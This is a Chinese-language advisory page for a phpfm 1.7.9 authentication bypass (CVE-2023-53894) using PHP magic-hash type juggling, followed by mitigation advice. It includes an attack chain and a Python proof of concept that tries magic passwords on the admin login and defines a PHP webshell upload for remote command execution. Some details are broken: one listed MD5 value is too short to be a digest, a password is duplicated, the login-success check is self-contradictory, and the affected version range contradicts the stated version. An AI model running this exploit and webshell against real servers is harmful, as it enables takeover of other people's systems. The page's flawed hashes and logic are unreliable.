CVE-2023-53894 phpfm 1.7.9 认证绕过漏洞

漏洞信息

漏洞编号

CVE-2023-53894

漏洞类型

认证绕过/类型混淆漏洞

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

phpfm 1.7.9

漏洞概述

phpfm 1.7.9版本存在严重的认证绕过漏洞，攻击者可以通过利用密码哈希验证中的松散类型比较（loose type comparison）来绕过身份认证。该漏洞源于PHP在比较字符串时采用弱类型比较机制，当密码哈希值以特定格式（如0e开头）存在时，PHP会将其解析为科学计数法数值0，导致任意字符串只要哈希值以0e开头就能通过验证。攻击者无需任何凭证即可登录系统管理后台，成功登录后可上传恶意PHP文件到服务器，最终实现远程代码执行，完全控制目标服务器。由于该漏洞攻击复杂度低且无需用户交互，CVSS评分高达9.8，属于严重安全威胁。建议相关用户立即升级到安全版本或采取临时缓解措施。

技术细节

该漏洞是典型的PHP类型混淆（Type Juggling）安全问题。在phpfm 1.7.9的密码验证逻辑中，使用了PHP的弱类型比较运算符（如==或!=）而非严格比较运算符（===或!==）。当用户输入的密码经过MD5或SHA1等哈希算法处理后，如果得到的哈希值以0e开头且后续字符均为数字，PHP会将其解释为科学计数法表示的数值0。例如，密码的哈希值为0e123456789，由于PHP的松散比较特性，0e123456789 == 0会返回true。攻击者可以利用这一特性，通过预先计算符合条件的密码（如240610708的MD5值为0e4340419627524296），使用这些特殊构造的密码即可绕过正常的密码验证流程。登录成功后，攻击者可利用phpfm的文件上传功能上传包含webshell的PHP文件，通过访问该文件实现远程代码执行。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先识别目标服务器上运行的phpfm版本，确认版本为1.7.9或更早版本，以确定漏洞存在的可能性。

STEP 2

步骤2: 构造特殊密码哈希

攻击者使用预先计算的密码列表，这些密码的MD5或SHA哈希值以0e开头且后续字符全为数字，如240610708的MD5值为0e4340419627524296。

STEP 3

步骤3: 绕过认证登录

使用构造的特殊密码和默认用户名（如admin）尝试登录phpfm后台。PHP的松散类型比较会将0e开头的哈希值解释为数值0，导致验证逻辑认为密码正确。

STEP 4

步骤4: 获取管理员会话

成功绕过认证后，攻击者获得管理员会话cookie或访问令牌，可完全控制phpfm文件管理器。

STEP 5

步骤5: 上传恶意PHP文件

利用phpfm的文件上传功能，上传包含webshell代码的PHP文件到服务器可访问目录。

STEP 6

步骤6: 执行远程代码

通过HTTP请求访问上传的webshell文件，在URL参数中传递系统命令，实现远程代码执行，完全控制目标服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53894 Authentication Bypass PoC
# Target: phpfm <= 1.7.9
# Attack: Type Juggling in password hash validation

import requests
import hashlib

target_url = "http://target.com/phpfm"

# Known passwords with MD5 hashes starting with 0e
magic_passwords = [
    "240610708",  # MD5: 0e4340419627524296
    "QNKCDZO",    # MD5: 0e830400451993494058024219903391
    "s878926199a", # MD5: 0e545993274517709034328855841020
    "s155964671a", # MD5: 0e342768416822451524974117254469
    "s214587387a", # MD5: 0e848240845830648910665489740247
    "s214587387a"  # MD5: 0e848240845830648910665489740247
]

def check_vulnerability():
    """Check if target is vulnerable to CVE-2023-53894"""
    print(f"[*] Testing target: {target_url}")
    
    for password in magic_passwords:
        md5_hash = hashlib.md5(password.encode()).hexdigest()
        print(f"[*] Trying password: {password} (MD5: {md5_hash})")
        
        # Attempt login with magic password
        login_data = {
            "username": "admin",
            "password": password
        }
        
        try:
            response = requests.post(f"{target_url}/login.php", data=login_data, timeout=10)
            
            if response.status_code == 200:
                if "success" in response.text.lower() or response.status_code == 302:
                    print(f"[!] VULNERABLE! Login successful with password: {password}")
                    print(f"[+] MD5 hash: {md5_hash}")
                    return True
        except Exception as e:
            print(f"[-] Error: {e}")
    
    print("[-] Target may not be vulnerable or already patched")
    return False

def upload_shell(session_cookie):
    """Upload malicious PHP file after successful authentication"""
    print("[*] Uploading webshell...")
    
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    files = {
        'file': ('shell.php', webshell, 'application/x-php')
    }
    cookies = {'PHPSESSID': session_cookie}
    
    try:
        response = requests.post(f"{target_url}/upload.php", files=files, cookies=cookies)
        if response.status_code == 200:
            print("[+] Webshell uploaded successfully!")
            print(f"[*] Access shell at: {target_url}/uploads/shell.php?cmd=whoami")
    except Exception as e:
        print(f"[-] Upload failed: {e}")

if __name__ == "__main__":
    check_vulnerability()

影响范围

phpfm < 1.7.9

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 暂时禁用phpfm的文件上传功能；2) 限制对管理界面的访问，仅允许受信任的IP地址访问；3) 部署Web应用防火墙（WAF）规则，检测和阻止类型混淆攻击特征；4) 监控认证日志，关注异常的登录行为；5) 考虑使用VPN或跳板机访问管理后台；6) 定期备份服务器数据以便发生安全事件时快速恢复。